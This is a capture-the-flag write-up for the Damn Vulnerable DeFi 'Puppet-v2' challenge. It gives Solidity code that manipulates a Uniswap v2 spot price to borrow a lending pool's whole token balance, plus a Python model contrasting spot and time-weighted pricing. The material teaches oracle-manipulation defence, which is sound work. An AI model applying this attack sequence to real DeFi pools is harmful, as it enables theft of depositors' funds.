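To learn solidity and foundry systematically, I rewrote the damnvulnerable-defi solutions on top of the foundry test framework. Discussion and contributions are welcome~🎉
The attack idea for this challenge is similar to Puppet-v1: it still uses the uniswap price oracle to attack the pool.
Note that everything here uses uniswap-v2, where the pair is made of token and weth. The player, however, starts with only eth, so it has to interact with the weth contract.
The complete attack flow is shown in the figure below: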
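swapExactTokensForTokens: swap all of the token in the player account for weth, which lowers the unit price of token on uniswap
borrow: call this method to borrow all of the token held by the pool
The complete steps, as example code: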
```solidity
// allow the router to spend all of the player's token
token.approve(address(uniswapV2Router), PLAYER_INITIAL_TOKEN_BALANCE);
address[] memory path = new address[](2);
path[0] = address(token);
path[1] = address(weth);
// swap token to weth
uniswapV2Router.swapExactTokensForTokens(
    PLAYER_INITIAL_TOKEN_BALANCE, // amount in
    1, // amount out min
    path, // path
    address(player), // to
    block.timestamp * 2 // deadline
);
// weth deposit the pool now asks for, priced from the changed reserves
uint256 value = pool.calculateDepositOfWETHRequired(POOL_INITIAL_TOKEN_BALANCE);
// wrap only the eth still missing after the weth received from the swap
uint256 depositValue = value - weth.balanceOf(address(player));
weth.deposit{value: depositValue}();
weth.approve(address(pool), value);
// borrow all of the pool's token against the weth deposit
pool.borrow(POOL_INITIAL_TOKEN_BALANCE);
```
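Why a single swap moves the required deposit so far, and how a time-weighted price behaves instead, as an added Python illustration that is not part of the original post. The reserves, balances, the 3x deposit factor and the 12 s / 1800 s window are constructed sample values, and `deposit_required` and `twap` are hypothetical models, not the pool's code.

```python
WAD = 10**18
# Constructed sample balances in wei (assumptions, not taken from the page).
RESERVE_TOKEN = 100 * WAD        # token reserve of the uniswap-v2 pair
RESERVE_WETH = 10 * WAD          # weth reserve of the pair
PLAYER_TOKENS = 10_000 * WAD     # stands in for PLAYER_INITIAL_TOKEN_BALANCE
PLAYER_ETH = 20 * WAD            # eth the player starts with
POOL_TOKENS = 1_000_000 * WAD    # stands in for POOL_INITIAL_TOKEN_BALANCE
DEPOSIT_FACTOR = 3               # assumed collateral multiple of the pool

def get_amount_out(amount_in, reserve_in, reserve_out):
    """Uniswap v2 swap output with the 0.3% fee, in integer math."""
    with_fee = amount_in * 997
    return with_fee * reserve_out // (reserve_in * 1000 + with_fee)

def spot_price(reserve_token, reserve_weth):
    """weth per token (scaled by WAD), read from the current reserves."""
    return reserve_weth * WAD // reserve_token

def deposit_required(token_amount, price):
    """Hypothetical pool rule: collateral = DEPOSIT_FACTOR x quoted value."""
    return token_amount * price // WAD * DEPOSIT_FACTOR

def twap(price_before, price_after, held_s, window_s):
    """Time-weighted average when price_after holds for held_s of window_s."""
    return (price_before * (window_s - held_s) + price_after * held_s) // window_s

def simulate(held_s=12, window_s=1800):
    p0 = spot_price(RESERVE_TOKEN, RESERVE_WETH)
    weth_out = get_amount_out(PLAYER_TOKENS, RESERVE_TOKEN, RESERVE_WETH)
    # After the swap the pair holds more token and less weth.
    p1 = spot_price(RESERVE_TOKEN + PLAYER_TOKENS, RESERVE_WETH - weth_out)
    after = deposit_required(POOL_TOKENS, p1)
    return {
        "weth_out": weth_out,
        "spot_before": deposit_required(POOL_TOKENS, p0),
        "spot_after": after,
        "player_can_cover": PLAYER_ETH + weth_out >= after,
        "twap_after": deposit_required(POOL_TOKENS, twap(p0, p1, held_s, window_s)),
    }

if __name__ == "__main__":
    for name, value in simulate().items():
        print(name, value if isinstance(value, bool) else value / WAD)
```

With these sample numbers the spot-priced deposit falls from 300000 weth to under 30 weth, while the time-weighted figure stays close to the original, which is why a lending pool should not price collateral from instantaneous pair reserves.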